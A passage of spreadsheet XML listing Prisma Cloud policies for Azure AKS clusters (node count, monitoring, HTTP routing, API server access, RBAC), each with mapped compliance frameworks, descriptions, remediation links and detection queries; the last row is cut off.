      <c r="B2284" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2284" s="2" t="inlineStr"/>
      <c r="D2284" t="inlineStr"/>
      <c r="E2284" t="inlineStr"/>
      <c r="F2284" t="inlineStr"/>
      <c r="G2284" t="b">
        <v>1</v>
      </c>
      <c r="H22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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2284" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2284" t="inlineStr">
        <is>
          <t>Azure AKS cluster pool profile count contains less than 3 nodes</t>
        </is>
      </c>
      <c r="L2284" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2284" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2284" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2284" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2284" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2284" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2284" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2284" t="inlineStr"/>
      <c r="T2284" t="b">
        <v>0</v>
      </c>
      <c r="U2284" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2284" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2284" t="inlineStr">
        <is>
          <t>This policy identifies AKS clusters that are configured with node pool profile less than 3 nodes. It is recommended to have at least 3 or more than 3 nodes in a node pool for a more resilient cluster. (Clusters smaller than 3 may experience downtime during upgrades.)</t>
        </is>
      </c>
      <c r="X2284" t="inlineStr">
        <is>
          <t>To scale AKS cluster node pool nodes count, follow below URL:
https://learn.microsoft.com/en-gb/azure/aks/scale-cluster?tabs=azure-cli</t>
        </is>
      </c>
      <c r="Y2284" t="inlineStr"/>
      <c r="Z2284" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kubernetes-cluster' AND json.rule = 'properties.powerState.code equal ignore case Running and properties.agentPoolProfiles[?any(type equal ignore case AvailabilitySet and count less than 3)] exists'</t>
        </is>
      </c>
      <c r="AA2284" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2284" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2284" t="inlineStr">
        <is>
          <t>PC-AZR-K8S-394</t>
        </is>
      </c>
      <c r="AD2284" t="b">
        <v>1</v>
      </c>
      <c r="AE2284" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2284" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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4" t="inlineStr">
        <is>
          <t>46e1ba70-fb35-4a44-a551-17ea04c4d8e7</t>
        </is>
      </c>
      <c r="AI2284" t="inlineStr">
        <is>
          <t>cbfe2dc0-85e0-4444-8433-594d39b45d7f</t>
        </is>
      </c>
      <c r="AJ2284" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2284" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2285">
      <c r="A2285" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), kfirdaus AWS Account-CS, NIST CSF v2.0, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO 27002:2022, NIST SP 800-172, ISO/IEC 27002:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, ITSG-33, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, TX-RAMP Level 1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v8, CSA CCM v.4.0.1, HITRUST CSF v.11.2.0, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO/IEC 27017:2015, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, TX-RAMP Level 1, TX-RAMP Level 2, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Copy of CIS Controls v8, TX-RAMP Level 2, CyberSecurity Law of the People's Republic of China, CSA CCM v4.0.12, PCI DSS v4.0, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v3.2.1, CyberSecurity Law of the People's Republic of China, kashan ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, Copy of CIS Controls v8, ITSG-33, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CIS Controls v8, TX-RAMP Level 1, SOC 2, FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CRI Profile v2.0, Insurance Regulatory And Development Authority Of India, ACSC Information Security Manual (ISM), CRI Profile v1.2.1, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CDC NIST 800-53 Rev4, SOC 2, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, HITRUST v.9.4.2 [Deprecated], PIPEDA, NIST CSF, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, CRI Profile v1.2.1, NIST 800-53 Rev4, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, CCPA 2018, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, ISO/IEC 27001:2022, DORA, CyberSecurity Law of the People's Republic of China, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2285" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2285" s="2" t="inlineStr"/>
      <c r="D2285" t="inlineStr"/>
      <c r="E2285" t="inlineStr"/>
      <c r="F2285" t="inlineStr"/>
      <c r="G2285" t="b">
        <v>1</v>
      </c>
      <c r="H22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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2285" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2285" t="inlineStr">
        <is>
          <t>Azure AKS cluster monitoring not enabled</t>
        </is>
      </c>
      <c r="L2285" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2285" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2285" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2285" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2285" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2285" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2285" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2285" t="inlineStr"/>
      <c r="T2285" t="b">
        <v>0</v>
      </c>
      <c r="U2285" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2285" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2285" t="inlineStr">
        <is>
          <t>Azure Monitor for containers is a feature designed to monitor the performance of container workloads deployed to either Azure Container Instances or managed Kubernetes clusters hosted on Azure Kubernetes Service (AKS). Monitoring your containers is critical, especially when you're running a production cluster, at scale, with multiple applications.
This policy checks your AKS cluster monitoring add-on setting and alerts if no configuration is found, or monitoring is disabled.</t>
        </is>
      </c>
      <c r="X2285" t="inlineStr">
        <is>
          <t>To enable monitoring for your AKS cluster, follow the below URL:
https://learn.microsoft.com/en-us/azure/aks/monitor-aks#configure-monitoring 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-1
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-1</t>
        </is>
      </c>
      <c r="Y2285" t="inlineStr"/>
      <c r="Z2285" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kubernetes-cluster' AND json.rule =  properties.addonProfiles.omsagent.config does not exist or properties.addonProfiles.omsagent.enabled is false
{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA2285" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2285" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2285" t="inlineStr">
        <is>
          <t>PC-AZR-K8S-392-CKV_AZURE_4</t>
        </is>
      </c>
      <c r="AD2285" t="b">
        <v>1</v>
      </c>
      <c r="AE2285" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2285" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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5" t="inlineStr">
        <is>
          <t>be55c11a-981a-4f34-a2e7-81ce40d71aa5</t>
        </is>
      </c>
      <c r="AI2285" t="inlineStr">
        <is>
          <t>455d48c0-5775-4a69-9844-083b33d68781</t>
        </is>
      </c>
      <c r="AJ2285" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2285" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2286">
      <c r="A2286" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, HIPAA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, ISO 27002:2022, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2024.2, Copy of New Zealand Information Security Manual (NZISM v3.4), Telecommunications Security Act - TSA, CSA CCM v.4.0.6, ISO 27002:2022, SOC 2, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO/IEC 27017:2015, GDPR, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, DORA, ISO/IEC 27002:2013, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, ISO/IEC 27002:2013, NIST 800-53 Rev4, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, FFIEC, ISO/IEC 27018:2019, Copy of CIS Controls v8, ISO/IEC 27017:2015, SOC 2, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, SOC 2, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, ITSG-33, Cybersecurity Maturity Model Certification (CMMC) v.1.02, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CSA CCM v.4.0.6, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v4.0.12, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, Australian Energy Sector Cyber Security Framework (AESCSF), PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, TX-RAMP Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, CSA CCM v.4.0.1, NIST SP 800-172, HIPAA, HIPAA</t>
        </is>
      </c>
      <c r="B2286" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2286" s="2" t="inlineStr"/>
      <c r="D2286" t="inlineStr"/>
      <c r="E2286" t="inlineStr"/>
      <c r="F2286" t="inlineStr"/>
      <c r="G2286" t="b">
        <v>1</v>
      </c>
      <c r="H22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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2286" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2286" t="inlineStr">
        <is>
          <t>Azure AKS cluster HTTP application routing enabled</t>
        </is>
      </c>
      <c r="L2286" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2286" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2286" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2286" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2286" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2286" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2286" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2286" t="inlineStr"/>
      <c r="T2286" t="b">
        <v>0</v>
      </c>
      <c r="U2286" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2286" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2286" t="inlineStr">
        <is>
          <t>HTTP application routing configures an Ingress controller in your AKS cluster. As applications are deployed, the solution also creates publicly accessible DNS names for application endpoints. While this makes it easy to access applications that are deployed to your Azure AKS cluster, this add-on is not recommended for production use.
This policy checks your AKS cluster HTTP application routing add-on setting and alerts if enabled.</t>
        </is>
      </c>
      <c r="X2286" t="inlineStr">
        <is>
          <t>To disable HTTP application routing for your AKS cluster, follow the below URL:
https://learn.microsoft.com/en-us/azure/aks/http-application-routing#remove-http-routing</t>
        </is>
      </c>
      <c r="Y2286" t="inlineStr"/>
      <c r="Z2286" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kubernetes-cluster' AND json.rule =  properties.addonProfiles.httpapplicationrouting.enabled is true or properties.addonProfiles.httpApplicationRouting.enabled is true</t>
        </is>
      </c>
      <c r="AA2286" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2286" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2286" t="inlineStr">
        <is>
          <t>PC-AZR-K8S-390</t>
        </is>
      </c>
      <c r="AD2286" t="b">
        <v>1</v>
      </c>
      <c r="AE2286" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2286" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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6" t="inlineStr">
        <is>
          <t>0429670c-5d2d-4d0f-ab33-59eb5e000305</t>
        </is>
      </c>
      <c r="AI2286" t="inlineStr">
        <is>
          <t>9d22d97d-8c3b-49fa-921d-d5f6f3b5a494</t>
        </is>
      </c>
      <c r="AJ2286" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2286" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2287">
      <c r="A2287" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, HIPAA, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, TX-RAMP Level 1, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2287" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2287" s="2" t="inlineStr"/>
      <c r="D2287" t="inlineStr"/>
      <c r="E2287" t="inlineStr"/>
      <c r="F2287" t="inlineStr"/>
      <c r="G2287" t="b">
        <v>1</v>
      </c>
      <c r="H22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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2287" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2287" t="inlineStr">
        <is>
          <t>Azure AKS cluster configured with overly permissive API server access</t>
        </is>
      </c>
      <c r="L2287" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2287" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2287" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2287" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2287" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2287" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2287" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S2287" t="inlineStr"/>
      <c r="T2287" t="b">
        <v>0</v>
      </c>
      <c r="U2287" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2287" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2287" t="inlineStr">
        <is>
          <t>This policy identifies AKS clusters configured with overly permissive API server access. In Kubernetes, the API server receives requests to perform actions in the cluster such as to create resources or scale the number of nodes. To enhance cluster security and minimize attacks, the API server should only be accessible from a limited set of IP address ranges. These IP ranges allow defined IP address ranges to communicate with the API server. A request made to the API server from an IP address that is not part of these authorized IP ranges is blocked. It is recommended to configure AKS cluster with defined IP address ranges to communicate with the API server.</t>
        </is>
      </c>
      <c r="X2287" t="inlineStr">
        <is>
          <t>To configure AKS cluster with defined IP address ranges to communicate with the API server; refer below URL:
https://docs.microsoft.com/en-us/azure/aks/api-server-authorized-ip-ranges#update-disable-and-find-authorized-ip-ranges-using-azure-portal 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-3
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-3</t>
        </is>
      </c>
      <c r="Y2287" t="inlineStr"/>
      <c r="Z2287" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kubernetes-cluster' AND json.rule = properties.powerState.code equal ignore case Running and properties.apiServerAccessProfile.enablePrivateCluster is false and (properties.apiServerAccessProfile.authorizedIPRanges does not exist or properties.apiServerAccessProfile.authorizedIPRanges is empty)
{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA2287" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2287" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2287" t="inlineStr">
        <is>
          <t>PC-AZR-K8S-935-CKV_AZURE_6</t>
        </is>
      </c>
      <c r="AD2287" t="b">
        <v>1</v>
      </c>
      <c r="AE2287" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2287" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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7" t="inlineStr">
        <is>
          <t>40bb8745-0b6c-4db4-8793-7b1d5bc9afa7</t>
        </is>
      </c>
      <c r="AI2287" t="inlineStr">
        <is>
          <t>8d05a24e-e700-41b2-8d9d-56af90e1dcdf</t>
        </is>
      </c>
      <c r="AJ2287" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2287" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2288">
      <c r="A2288" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, Azure Security Benchmark (v2), Copy of Azure Security Benchmark (v3), APRA (CPS 234) Information Security, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS v1.3.0 (Azure), Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS v1.3.1 (Azure), MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, NIST CSF, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, ISO 27002:2022, Copy of CIS v1.2.0 (Azure), ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, ISO 27002:2022, MTSBv2_Azure, Azure Security Benchmark (v3), ISO/IEC 27002:2013, CIS v1.1 (Azure), NIST SP 800-172, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v6.3 [Deprecated], NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, Copy of Azure Security Benchmark (v3), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, PCI DSS v4.0, ISO/IEC 27018:2019, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, APRA (CPS 234) Information Security, CIS v1.2.0 (Azure), Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), PCI DSS v3.2.1, testazure, CIS Controls v8, MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), CIS v1.4.0 (Azure), ISO/IEC 27002:2013, Azure Security Benchmark (v3), kfirdaus AWS Account-CS, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, CDC NIST 800-53 Rev4, CSA CCM v.4.0.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CCPA 2018, PIPEDA, Demo_Daryl ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), NIST 800-53 Rev 5, ACSC Information Security Manual (ISM), CIS Controls v7.1, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), MITRE ATT&amp;CK v6.3 [Deprecated], PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2288" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2288" s="2" t="inlineStr"/>
      <c r="D2288" t="inlineStr"/>
      <c r="E2288" t="inlineStr"/>
      <c r="F2288" t="inlineStr"/>
      <c r="G2288" t="b">
        <v>1</v>
      </c>
      <c r="H22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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2288" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2288" t="inlineStr">
        <is>
          <t>Azure AKS enable role-based access control (RBAC) not enforced</t>
        </is>
      </c>
      <c r="L2288" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2288" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2288" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2288" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2288" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2288" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2288" t="inlineStr">
        <is>
          <t>ISM-1648</t>
        </is>
      </c>
      <c r="S2288" t="inlineStr"/>
      <c r="T2288" t="b">
        <v>0</v>
      </c>
      <c r="U2288" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2288" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2288" t="inlineStr">
        <is>
          <t>To provide granular filtering of the actions that users can perform, Kubernetes uses role-based access controls (RBAC). This control mechanism lets you assign users, or groups of users, permission to do things like create or modify resources, or view logs from running application workloads. These permissions can be scoped to a single namespace, or granted across the entire AKS cluster.
This policy checks your AKS cluster RBAC setting and alerts if disabled.</t>
        </is>
      </c>
      <c r="X2288" t="inlineStr">
        <is>
          <t>To create a new AKS cluster with RBAC enabled, follow the below URL:
https://learn.microsoft.com/en-us/azure/aks/manage-azure-rbac#create-a-new-cluster-using-azure-rbac-and-managed-azure-ad-integration 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-2
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/bc-azr-kubernetes-2</t>
        </is>
      </c>
      <c r="Y2288" t="inlineStr"/>
      <c r="Z2288" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kubernetes-cluster' AND json.rule =  properties.enableRBAC is false
{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA2288" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2288" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2288" t="inlineStr">
        <is>
          <t>PC-AZR-K8S-391-CKV_AZURE_5</t>
        </is>
      </c>
      <c r="AD2288" t="b">
        <v>1</v>
      </c>
      <c r="AE2288" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2288" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>3b6626af-9601-4e99-ace5-7197cba0d37d</t>
        </is>
      </c>
      <c r="AI2288" t="inlineStr">
        <is>
          <t>2e24de17-7a27-4da7-93a1-e62cf9bdf832</t>
        </is>
      </c>
      <c r="AJ2288" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2288" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2289">
      <c r="A2289" t="inlineStr">
        <is>
          <t>HIPAA, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, HIPAA, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2289" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2289" s="2" t="inlineStr"/>
      <c r="D2289" t="inlineStr"/>
      <c r="E2289" t="inlineStr"/>
      <c r="F2289" t="inlineStr"/>
      <c r="G2289" t="b">
        <v>1</v>
      </c>
      <c r="H22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89" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2289" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2289" t="inlineStr">
        <is>
